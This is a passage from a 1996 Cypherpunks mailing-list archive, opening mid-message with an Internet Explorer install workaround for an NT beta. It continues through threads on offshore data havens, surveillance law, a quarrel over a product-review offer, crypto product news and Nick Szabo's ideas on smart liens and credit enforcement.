a copy of it somewhere and disagree.

3. Run the Prod code. Agree to the lic. and wait for the prompt for
optional Internet components.  Find the temp dir for this install and make
a copy of it.

4. Run msie.exe from yorur new dir in step 4. This will make a new temp
dir. Find it and make a copy.

5. In the dir made in step 4 you will find a CAB file and a IE.inf file. 
These need to be copied to the dir made in step 2.  REN the ie.inf to
ohrome.inf and run the infinst.exe file. This should install the production
code on your beta II of NT

Good Luck. 



Steve Bonine <spb@ntrs.com> wrote in article
<1996Aug13.085057.6086@news.ntrs.com>...
> The just-released version of Internet Explorer for NT informs you that it
> requires build 1381 or higher to run.  It imparts this bit of trivia
AFTER it
> has blown away the IE that you had installed.  Beta 2 is build 1314; 1381
must
> be the one that they have shipped to VARs.
> 
> Brilliant move.  Release a product to the general public which runs on an
OS
> that you have NOT released to the general public.
> 



Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMhS4fctPRTNbb5z9AQF55wf8DIt7XF/DxxEJrppB4wmbqp2dz4zv8An2
2pJVieQ7CpYESozJCZFuHZjIxg29okjqQhPCIM4Q/4OHkcuRmZ8jFI+FCnO+0NZr
2jp2CI3AAWJ6cZBifwMrNCTBxySo5ZVLGxUQwZKyfcDHDWvZpoMTWEJXoI+tVSc/
FC0yRdQbwqaIrO4K+4k98nycS4CdMSTPhAU6bmC4KWFwX5h54JVV7D033FkAUklV
Esknfo2zE7byq10UZqMqYCs6/5u8PlIPtqkhxo/slQFT8wr461RVO/OuJBJyiavi
B1q3wrgIkTF9dXS1zHpJO4JwqI0TLtgLpEGas8T9HRdBkI6ojKaXxA==
=tvhI
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 16 Aug 1996 13:37:20 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Floating DataHaven
In-Reply-To: <Pine.LNX.3.91.960815194218.16207H-100000@offshore>
Message-ID: <Pine.WNT.3.95.960816110216.-123391E-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


What about pirate attacks, acts of war from hostile countries etc.?
Actually, also being a sovereign state won't help much if you are small,
and I'm not referring to obvious dope-smuggling fronts like Noriega's
Panama: in the fifties, the 700-year old Republic of San Marino cancelled
plans of opening a casino after Italy sealed its border (the only border
San Marino has).

Enzo

On Thu, 15 Aug 1996, Vincent Cate wrote:

> 
> William Knowles <erehwon@c2.org>
> > 
> > Something that I thought would make an excellent data haven would
> > be older offshore oil platforms,
> > [...]
> > You have to wonder how cheap these could sell 
> > for just to get them off the oil companies hands? 
> 
> A floating DataHaven is probably the way to get the ultimate in 
> freedom.  
> 
> There is someone on Anguilla that bought a used floating oil platform for
> $1 million.  It is big enough for 200 people to live on.  It is not here,
> so I have not seen it. 
> 
> There is someone else here who says that there are some really old ones
> that you can get just for hauling them away. Some countries will not let
> owners just sink them. 
> 
> You can get Internet via radio links for reasonable prices.  And via
> satellite for almost affordable prices.  When Bill Gates 900 satellites
> get up there it should be very affordable. 
> 
>   --  Vince
> 
> -----------------------------------------------------------------------
> Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
> Offshore Information Services         http://www.offshore.com.ai/
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 17 Aug 1996 02:44:00 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla - legal action or lack thereof
In-Reply-To: <Pine.LNX.3.91.960814075142.12075B-100000@offshore>
Message-ID: <Pine.SUN.3.94.960816110502.24799A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Aug 1996, Vincent Cate wrote:

> 
> Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>
> > 
> > "Greg Kucharo" <sophi@best.com> writes:
> > >   While Tim may be right that nobility is lost when backing down to the
> > > authorities, the fact is that this game has little to do with noble
> > > purposes. ...

[...]

> However, my work permit is up for renewal.  They would not ever have to
> take legal action to shut me down, just decide not to renew my work
> permit, and I would have to leave the island. 

[...]

> My lawyer says it is illegal to sell fake passports in Anguilla. So
> defending this guy could easily have been a fight to my death as an
> Anguilla ISP.

First, Mr. Cate, I appreciate your service, and I think it's a step in the
right direction.  The way that I see it your service is focused on
providing a degree of regulatory arbitrage.  It also seems that the
service is designed, and defended with those purposes in mind.  As far as
I can tell you did and do not intend Offshore Information Services to be a
"Data Haven" in the strict sense of the word.  I recall you stating that
rather specifically, but I may have missed attributation somewhere.

Members of the list should try to take note of this.

Mr. Cate is running a Regulatory Arbitrage Internet Service Provider
(RAISP) not a Data Haven.  

To me the distinction is this:

An RAISP seeks to avoid the application of undue reglation by locating in
a jurisdiction where regulation is more limited.

A Data haven seeks to avoid the application of any regulation by
maintaining such secrecy and instant mobility so as to continue to operate
even if authorities bring all their power to bear.

Mr. Cate clearly is in a sensitive position that does not give him the
instant mobility to just jump ship.  He is at the mercy of the authorities
(even if they are laxer than those say in the United States) to the extent
he has no backup plan.  This, by the way, is not a criticism.  This is
entirely consistent with his purpose.

For the RAISP operator, the words "My lawyer tells me that's illegal here"
is the end of the argument.

For the Data Haven operator, the word "My lawyer tells me that's illegal
here" prompts the command "Prepare to make the jump into cyberspace."

I would suggest members of the list reconsider the value of the service
provided by, and the limitations imposed on Mr. Cate.

>    --  Vince
> 
> -----------------------------------------------------------------------
> Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
> Offshore Information Services         http://www.offshore.com.ai/
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 17 Aug 1996 04:39:40 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <Pine.LNX.3.91.960814081442.12075C-100000@offshore>
Message-ID: <Pine.SUN.3.94.960816111931.24799B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Aug 1996, Vincent Cate wrote:

> 
> Tim:
> > Rather, there is an "archetype," if you will, of what a "remailer" is, what
> > a "data haven" is, what a "tax shelter" is, etc. While we cannot reasonably
> > expect a remailer to exactly match the archetype, we can point out obvious
> > deficiencies.
> 
> 1)  Anguilla has secrecy laws.  Professional relationships are confidential.
>     There are strong secrecy laws.  I have not given out taxbomber's
>     name, nor will I as I could face legal action if I did.
> 
> 2)  Anguilla has no sales or income taxes.  A business does not need to
>     report anything about income, sales, etc, to the government (or anyone
>     else).  If a guy wants to sell his data and keep 100% of the profits
>     instead of 50% or 60%, then Anguilla would be a haven for him.
> 
> 3)  We don't have the same laws as other countries, so there are things
>     that can be done here.  For example, we can export encryption 
>     software.  Also, we will have bingo.com in Anguilla.
> 
> There are deficiencies from a cypherpunk or Libertarian point of view. And
> these are interesting.  And exactly what I want to do is changing. As I
> said, Anguilla is not the datahaven of cypherpunks wet dreams.  I am sure
> there are no datahavens that match the cypherpunk concept of an ideal
> datahaven, yet. 
> 
> But I think the term DataHaven applies as well to Anguilla as any other
> place I know of.  
> 
> Tim, we would all be very happy if you were to locate a country that could
> be the site of the ideal datahaven, and finance a couple cypherpunks to
> setup there.  It would be a big help to our cause.  Could you do this? 

In the way that you suggest, I would argue it is not possible.  You cannot
ever have a "DataHaven" in a single jurisdiction.  As Mr. Cate notes,
there is no jurisdiction that will fit the bill, nor do I ever expect
that one will be created.

> In the mean time, people may have to exist in cyberspace (like
> www.taxbomber.com) without having a totally secure physical location. 

The trick is to get the ISP to exist in cyberspace, or ever will it be
subject to the whim of the local authority.

This is a key and very important distinction.

> This is not the end of the world, or really even that painful.  If done
> right you could be down for only an hour - just long enough for
> nameservers to change.  Taxbomber is now setup to do it very fast next
> time, if the need ever comes.  Tim, I think you have even advocated this
> approach, not stressing the physical location, just the cyberspace
> location.  No? 

I have advocated the approach, but as applied to service providers, not
users of service providers.

>    --  Vince
> 
> -----------------------------------------------------------------------
> Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
> Offshore Information Services         http://www.offshore.com.ai/
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 17 Aug 1996 05:05:17 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches (fwd)
In-Reply-To: <199608151851.NAA09462@einstein>
Message-ID: <Pine.SUN.3.94.960816112851.24799C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, Jim Choate wrote:

> 
> Hi all,
> 
> > On Wed, 14 Aug 1996, Jim Choate wrote:
> > 
> > > 
> > > Forwarded message:
> > > 
> > > > Date: Wed, 14 Aug 1996 22:24:39 -0400 (EDT)
> > > > From: Black Unicorn <unicorn@schloss.li>
> > > > Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
> > > > 
> > > > Correct.  No warrant is required to observe that which is freely collected
> > > > after eminating from the residence of another and observed off his
> > > > property.
> > > > 
> > > > Same concept applies to the "sniff" test and ariel views into greenhouses.
> > > 
> > > Pitty somebody doesn't bring a suite against the FCC under this logic. It
> > > would particularly impact radar detectors, cell phones, and other types of
> > > scanners.
> > 
> > Uh, what is the chain of logic that supports this suit exactly?
> 
> Simple actualy. The police don't need a warrant to collect such information
> because it is in the public domain (ie not private and therefor requiring
> a search warrant and probable cause). Therefore anybody (not just cops)
> can pick it up.

This argument breaks down when one looks at the difference between state
action and private action.

Were one to follow this logic, it would come to pass that citizens could
get warants to search neighbor's residences.

> It is becoming more and more popular for governments to limit the ability
> of scanners and other such detectors to pick up information supposedly 
> to protect privacy. The above states that if it is eminating from the
> residence (and by extension person) and is picked up off their property,
> perhaps on or in public space then it is fair game.

Fair game for law enforcement use and can be presented in court, yes.
And, I might add, there is a different standard for voice communications
however carried.  The heat from a indoor pot garden is a different matter,
and incidently, the matter on which the question was presented.

> States such as N. Carolina (per extension via the 14th) should be 
> prohibited from regulating or otherwise controlling possesion and use
> of radar detectors (in this case) which are currently illegal for
> private persons to operate.

There is the additional matter of the obstruction of justice issues..

>I< tend to agree with you, but I see the arguments on the other side as
well.

> If the police don't need a warrant to
> collect information then citizens are equaly able to recieve that
> information as well.

How EXACTLY does this follow?

> Since the above ruling states that as long as the
> emissions are eminating from the site and the reception takes place
> other than at the site (in this case, being inside the police car)
> , perhaps along a public highway, then no privacy is involved. This
> means that citizens have a right, by extension, to know when they are
> being beamed by radar.

Again, you need to distinguish law enforcement purposes and private
purposes.
 
> This same chain of logic can be extended to cell phones and such as
> well.

And yet you need a warrant to intercept cell phone conversation.

> This connection is even clearer when one realizes that the only difference
> between IR and your cell phone eminations is frequency. The intermediate
> vector boson in both cases is a photon.

And the fact that cellphones carry voice communications.

> It is similar to arresting somebody for wearing a blue shirt but letting
> the person wearing the red shirt go free.

ANd having the blue shirt say "kill the president" maybe would even out
your example.

> The rationale being that since
> the frequency of the blue shirt is higher it is fundamentaly different
> then the red shirt.

No, the rational being that the blue shirt carries a communication more
complicated than a simple speed reading, or heat emmission.

> This ruling is prima facia evidence that the judicial system as a whole
> has no clear grasp of technology, not just Internet technology.

I think you are mistaken.

> 
>                                                      Jim Choate
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Sat, 17 Aug 1996 04:30:59 +0800
To: "John C. Randolph" <jcr@idiom.com>
Subject: Re: Lunch with Bill, anyone?
Message-ID: <199608161545.IAA13092@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:31 AM 8/16/96 -0700,John C. Randolph wrote:

>Meeting Bill Gates would be every bit as exciting as meeting Tony 
>Orlando.  Or maybe Wayne Newton.

I don't mind the sarcasm regarding Gates, but watch what you say about Wayne
Newton!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 17 Aug 1996 05:19:33 +0800
To: geoff <geoff@commtouch.co.il>
Subject: Re: (NOISE) Re: Free Pronto Secure Offer
In-Reply-To: <19960815232910268.AAB222@[194.90.26.189]>
Message-ID: <Pine.SUN.3.94.960816113716.24799D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Aug 1996, geoff wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To: unicorn@schloss.li, cypherpunks@toad.com
> Date: Fri Aug 16 02:41:34 1996
> Unicorn,
> 
> > No, I was merely pointing out that if the review revealed that it
> > had problems (one assumed that the intent of peer review is to reveal
> > such problems in the first place, but perhaps you just like giving
> > software away?) then the offered reward was valueless.
> 
> Peer review seems to have voted that their risk paid off.
>  
> > A lot of people use DES on this list too I'll wager.
> and...
> 
> > I "tried out" your promotional scheme when I read your message, and
> > it was that scheme which my opinion targeted.
> 
> You misinterpreted my reply to a list member's enquiry about whether 
> our offer of Pronto Secure in exchange for feedback was still 
> available. 
>  
> > This is a subjective question.
> Yes.
> 
> > Cypherpunks is always getting the cash poor developer who thinks he
> > very clever because he has to pay testers no money if he offers his 
> > new product free to the person who discovers a flaw, or writes a 
> > review.
> 
> Unicorn, you are again letting your fingers move faster than your 
> brain. On what do you base your evaluation of our liquidity ?

I didn't say anything about your liquidity did I?

 (not that 
> it is relevant). Most Cypherpunks are technically savvy and crypto 
> aware people, they provide a perfect community for evaluating and 
> debugging a security enabling product.

Which is why people are constantly trying to get their services for what
is in effect nothing.

> I would strongly recommend this 
> route to any developer of serious security enhancing software.

So would I, however, the assumption that "cypherpunk crypto review
services" are to be had for nothing is the height of arrogance.

> My 
> sincere thanks to all c'punks who have and continue to provide 
> incredibly valuable input into Pronto Secure.

If you were sincere, you'd thank them with cash.  Afterall, you seem
to suggest that you have a good deal of liquidity eh?
 
> > From your home page, I would guess that you request that reviewers
> > allow you to make their comments public.  That's called an 
> > endorsement, and, by the way, people are usually paid for them.  
> > Sometimes in the millions. Think Michael Jordan is getting a deal 
> > when you use his name to promote your product and then give him a 
> > $99.00 piece of software (which is effectively worth the amount of 
> > time it takes to write a few kiss ass paragraphs on the software, not 
> > $99.00)?
> 
> Unicorn, you are again making groundless assumptions. I suggest that 
> you do some fence painting before you enlighten us with your opinions 
> about our "kiss ass paragraphs" of code.

Uh, the kiss ass paragraphs were the reviewers comments, not your code.

Are you so used to attacks that you see every comment as one or what?

> Unless Michael Jordon is reading Schneier on the sly, his endorsement 
> of Pronto secure is not worth 99c.

THAT, is the key of your ignorance.  Endorsements are valueable if they
bring business, period.

Picture big ole MJ on TV with his suit and tie holding up your product and
proclaiming that his multi-level global investment strategy would be
impossible to do the way he does it without pronto-secure.

Not worth 99c?  Please.

> > Alturisim is a pipe dream.
> Depends what you are putting in your pipe :)
> I venture that most c'punks would agree that moving strong e-mail 
> security into mainstream is a good thing. This is not going to happen 
> without people making money from it.

Make all the money you want, but I grow weary of seeing "review my product
and get a consolation prize" deals.  I doubt I'm the only one.

> >> Unicorn, you are invited to whitewash my fence :)
> > Do I have to review pronto secure first?
> Yes.

I rest my case.

> Geoff.
> 
> - ---------------------------------------------------------------
> Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com 
> My PGP public Key 1814AD45 can be obtained by sending a message
> to geoff@commtouch.co.il with "Get PGP Key" as the subject.
> - ----------------------------------------------------------------
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: noconv
> 
> iQCVAwUBMhO1s0Lv5OMYFK1FAQG5WAP/XoLteaVpdhnLpj/pk/1aPiWX7Nx/h1cc
> 5Sf0mgOWv3Q9MASWHV2lKrgqF9jc15ZaymfJZDq1duGttrPj6SJqX/nwOTcYi006
> Hh3qh+LnXWnBd7QA/mZL5Fn4SLAOBno/uspqwMbM+6DCw39MpCY2NG0jQ2Qi8vMH
> n1IG+PYYTAs=
> =5HnW
> -----END PGP SIGNATURE-----
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Fri, 16 Aug 1996 16:50:29 +0800
To: cypherpunks@toad.com
Subject: The dangers of using radar
Message-ID: <1.5.4.32.19960816055206.002f2ef0@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


I picked this up on Marsha Woodbury's jokes list (not all are fiction!):

>>Two members of the British Lothian and Borders traffic police were out on
>>the Berwickshire moors with a radar gun recently, happily engaged in
>>apprehending speeding motorists, when their equipment suddenly
>>locked-up completely with an unexpected reading of well over 300 mph.
>>
>>The mystery was explained seconds later as a low flying Harrier hurtled
>>over their heads. The boys in blue, upset at the damage to their radar
>>gun, put in a complaint to the RAF, but were somewhat chastened
when the RAF >>pointed out that the damage might well have been more severe.
>>
>>It seems that the Harrier's target-seeker had locked onto the 'enemy'
>>radar and triggered an automatic retaliatory air-to-surface missile attack.
>>Luckily, the Harrier was operating unarmed.
>>
>>Otherwise... "Gee Officer, sorry about your patrol car........"

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 16 Aug 1996 20:47:45 +0800
To: cypherpunks@toad.com
Subject: Billy boy's satellites [Was - Floating DataHaven]
In-Reply-To: <Pine.LNX.3.91.960815194218.16207H-100000@offshore>
Message-ID: <321446BF.20431CA7@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Vincent Cate wrote:
 
> You can get Internet via radio links for reasonable prices.  And via
> satellite for almost affordable prices.  When Bill Gates 900 satellites
> get up there it should be very affordable.

... if a tad unrealiable?

The thought of 900 satelites in low orbit, all running NT, makes me
shudder.  Brings a new meaning to the expression "OS crash".

What are cypherpunks thoughts on this?  Who really believes it'll work?

Doesn't the low orbit part mean that the satellites will have a low life
expectancy, meaning a new launch every couple of days? (where's Gerald
Bull when you need him - oh yes, now I remember ...)

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 16 Aug 1996 23:25:16 +0800
To: cypherpunks@toad.com
Subject: ECC_pow
Message-ID: <199608161227.MAA15645@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-15-96. BW: 
 
   "Certicom's High Efficiency Elliptic Curve Cryptosystem to 
   be applied to Motorola's Wireless products." 
 
      Dr. Scott Vanstone, Certicom's Chief Cryptographer, 
      added, "Certicom is currently completing an ECC software 
      toolkit." The Elliptic Curve Cryptosystem is the world's 
      most efficient public-key system, providing the highest 
      strength-per-bit of any known public-key system and 
      minimizing the requirement for large key lengths. 
 
   "UK Company Unveils E-Mail Encryption Software." 
 
      Pow! Distribution has taken the wraps off PrivaSuite, an 
      e-mail encryption package that works as a drop-in to 
      many existing e-mail applications software. It can 
      handle almost any file format, encrypting the file using 
      the DES algorithm, it can also be set up to handle fax 
      image files. The package was developed by Aliroo, an 
      Israeli software house that specializes in document 
      security products. Aliroo was founded in 1995 by 
      ex-Israeli Military Intelligence officer Itzhak 
      Pomerantz. 
 
   ----- 
 
   http://jya.com/eccpow.txt  (9 kb for 2) 
 
   ECC_pow 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sat, 17 Aug 1996 06:33:05 +0800
To: cypherpunks@toad.com
Subject: Re: Protecting floating datahavens?
In-Reply-To: <Pine.LNX.3.91.960816121601.18100A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960816121628.18041B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



> From: William Knowles <erehwon@c2.org>
> Now I don't claim to be a naval defence expert, But from what 
> I do read of the dogeared copies of Jane's Defence Weekly, 
> Would be to install three or four Phalanx Close-In Weapons 

For those interested in todays piracty I recomment "Outlaws of 
the Ocean" by G.O.W. Mueller and Freda Adler.  The main types
of ocean outlaws:

     1) Smuggling (freon, dugs "square groupers" - bales of pot, ...)
     2) Immigration (illegal immigration can be very profitable)
     3) Insurance Fraud (tanker sinks, but unknow to the insurance
           company the oil had already been offloaded...)
     4) Violent crime  -  what I think of as piracy

Piracy is not a victimless crime.  Since there are victims, there is
someone to shoot at the pirates.  Makes it a tough business and not as
profitable as, some others. Most piracy occures in "known dangerous
areas".  Other piracy is drug dealers taking very fast boat so they have
an unregistered boat. 

There were some stories about freighters being attacked in one area, but
once they started all carrying guns, the attacks ended. 

After reading this my impression was that the odds of car-jacking or
mugging inside the USA were higher than the odds of a cruising boat
getting attacked by pirates. 

Pirates are going to pick what looks to them like easy targets. A Phalanx
or two on the side of a large boat would not look like an easy target. :-)
In fact, just one semi-automatic mounted on the side would probably
prevent all attacks by pirates. 

   --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arnauld Dravet <scraver@mnet.fr>
Date: Sat, 17 Aug 1996 06:52:25 +0800
To: cypherpunks@toad.com
Subject: signoff cypherpunks
Message-ID: <3214BCA6.6ED8124F@mnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


signoff cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 17 Aug 1996 07:41:09 +0800
To: Arun Mehta <cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption     Technology
Message-ID: <199608162021.NAA18831@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 PM 8/14/96 +0600, Arun Mehta wrote:
> I was trying to explain how incomes and prices happened to be
> lower in India, 

That was not an explanation, that was mystic word salad.  

It would be an explanation if wealth mysteriously rained
from the sky, rather than was produced by men.

James A Donald wrote:
> > The fact is a company like Informix has a campus in India, and
> > it has campuses in the US that are largely staffed by Indian teams,
> > and it will pay big bucks to get its people out of India, even
> > though it has to pay them more than ten times as much in the US.

Arun Mehta wrote:
> I imagine (not knowing why Informix does what it does) that the
> reason might have something to do with:
>
> 1) Bringing the programmer closer to the customer, to understand
> the problem better, or to commission the software, debug it under
> working conditions, whatever

In fact what gets sent to the Indian campus is largely legacy
work, which is in large part precisely the work that requires 
the closest contact with the customer, contact with actual 
working conditions, and the like.

This seems to be a general practice, not just an Informix practice, for
in an article on "India's silicon valley" I read that the work done in
India was largely done on existing legacy apps, often in obsolete
languages and operating systems.

This is of course the work that places the least amount of the
companies intellectual assets in India, and thus the work that
gives the Indian government the least power over Informix and its
activities.  Informix could abandon the Indian campus and all
the intellectual assets on which it was working, and all the
physical assets located there, at any moment and not suffer any 
serious loss or inconvenience.

It is overwhelmingly clear that the question is simply who has the 
power?  Those who wish to hire peoples services in order to produce
wealth, or those who can command peoples services because they have
guns?

That is what makes most people in some places poor and most people 
in some places affluent.

> Could you please be more precise? In what way does the "power of
> the Indian government" intrude? You use the term "proven" rather
> loosely... there could be other explanations for the company
> wanting to move its employees around.

Presumably the same kind of reasons as caused foreign companies
to flee India the first time around.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 17 Aug 1996 07:41:04 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Stopped Clock. Was: Schlafly on Crypto
In-Reply-To: <199608160821.BAA02713@toad.com>
Message-ID: <sDNRsD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
> (If Clinton had said things like "Of course I tried to avoid the draft
> and smoked dope, I'm no fool" and had dropped the draft and the Drug War
> instead of supporting both after he was President, I might have

There been no draft for about 20 years.  What have _you been smoking?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Fri, 16 Aug 1996 21:55:42 +0800
To: shamrock@netcom.com
Subject: Re: [SIGNAL] Microsoft's Internet Explorer
Message-ID: <Pine.GSO.3.93.960816141801.28899D-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 14 Aug 1996, Lucky Green asked:

> I don't see the 128 bit version. URL?

It is now available from www.microsoft.com/ie/download/
Choose the 128-bit IE 3.0 for Windows 95 & NT 4.0

In reply I got:
	Your Domain Name is not registered in the US or Canada

Someone please upload the 128-bit version to somewhere in Europe =)

Jüri Kaljundi
AS Stallion
jk@stallion.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com
Date: Sat, 17 Aug 1996 08:24:44 +0800
To: AltInst@cco.caltech.edu
Subject: Credit enforcement
In-Reply-To: <199608152033.QAA03582@prob>
Message-ID: <199608162123.OAA16545@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve Omohundro writes on alt-inst:
> I'm intrigued by the notion that in a digital economy
> contracts might be enforced by design rather than by the good faith of
> the participants. 

I have been intrigued by this possibility as well.  See my essay at
"http://www.best.com/~szabo/smart.contracts.html".   Steve has
put his finger on one of the basic outstanding problems
in this area, namely the enforcement of credit.  Currently
there are several partially effective processes:

* Reputation (especially credit reports): often effective, but
only to a point, as it is often hard for the debtor to accurately judge 
the future reputational effects of an action (eg failure to pay a bill,
taking out too large a loan, etc.) that has clear, local,
beneficial effects today.   This is more imbalance in knowledge
between current and distant consequences among individual 
consumers, but even among large organizations with high credit
ratings it is not an irrelevant factor.

* Secured transactions: liens, etc.

* Garnishment of future income

* Law enforcement, especially to enforce transfer of control over 
liened assets, garnishment, etc.

These processes have a fundamental property in common --
they violate the privity of credit transactions -- they bring
in third parties to track reputations or enforce repayment.
Credit transactions seem to entail a fundamental imbalance in 
incentives that can only be redressed by bringing in third parties.

Secured credit need not violate privity if the physical control
over the securing property can be shared.  So that, for
example, automobile credit can be secured as long as reposession is
possible.  The trick is to make repossession by the creditor
easy but theft by third parties difficult.  I have proposed 
"smart liens" along these lines, electronic security measures
strong against third parties but with a "back door" for
creditors.  This well-specified, shared control over "smart property"
more accurately reflects the agreement involving that property, so that 
there is less need for third parties.  To even more accurately 
reflect the contract, we need a mechanism to eliminate the creditor 
control once the auto loan has been payed off.

Alas, there is less incentive to provide these kinds
of contractual process improvements in a market where
government subsidizes the enforcement of contracts.

Similar mechanisms might be possible for other kinds of
security (houses, escrow accounts, etc.), but many valuable
kinds of credit are unsecured, and we run into privity problems when 
it comes to garnishment of future income.  Here, we are invoking third 
parties, namely the debtor's future contract counterparties.
Any mechanism seemingly needs to involve them, but both principals
have an incentive to enter a private, ungarnished 
contract in preference to one involving the creditor.
(ie, the amount of garnishment is a surplus to be divided
between principals who can route around it).

A way to a solution, if it were feasible, would be to give the creditor 
shared control over the entire scope of of the debtor's income
capabilities - or, a bit closer to practicality, over the entire scope of 
his digital income capabilities.  A secondary solution is some combination
of wide scope and limited compromise of privity.  After all, money itself 
is a compromise of privity, since the contract parties rely on third 
parties to clear and maintain the value of the currency.  Money's compromise 
of privity is well-defined, however, not an open-ended release of information
and physical control, even over one's own person, as often occurs with 
credit reports and law enforcement respectively.  Our challenge is to find
privity compromises with such well-defined limits to enforce
credit transactions.  

One possibility here is a "garnishable currency".  All banks 
have an interest in enforcing credit, so they can
make deals with each other to enforce credit via the garnishment
of debtor bank account deposits at any participating bank.  However, 
substantial amounts of garnishment (and if it provides a lower cost way of 
enforcing credit the amounts will be substantial) gives rise to an incentive 
for banks to fail to participate.  Here the need to commonly clear a currency 
between banks can be used as a barrier to entry for such defectors.
The currency is simply declared garnishable, and any banks who
wish to deal in the currency must participate in the garnishing
process.  This currency wins against competitor currencies
in a free-banking market because it provides a better means
to enforce credit, allowing greater credit expansion at lower
isk.

On the other hand, traditional coin and currency transfers, and 
some kinds of digital cash transfers, need not 
involve deposits to bank accounts linked (usually by True
Name, but a "debtor nym" could also work) to one's unsecured debts,
and given that there is a market for these kinds of transfers 
for other reasons, its existence allows banks to defeat auditing of 
garnishment by other banks participating in that currency.   Abuses 
of financial auditing for the purposes of extortion, inside information, etc.
will likely maintain a major market for the non-deposit 
payment methods.

Steve proposes "interval money" that would expire.   A similar idea
has been proposed by Tim May, a "time release" form of money that 
becomes good only after a certain date.  These can
probably be implemented by a digital mint expiring or activating
special issues of digital cash, or by a third party issuing
escrowed keys at specific times (since these keys are encrypted
against the escrow agent, and that agent doesn't know what they
will be used for, the escrow agent has no incentive to cheat).
A technical issue here is whether the digital signature space is large 
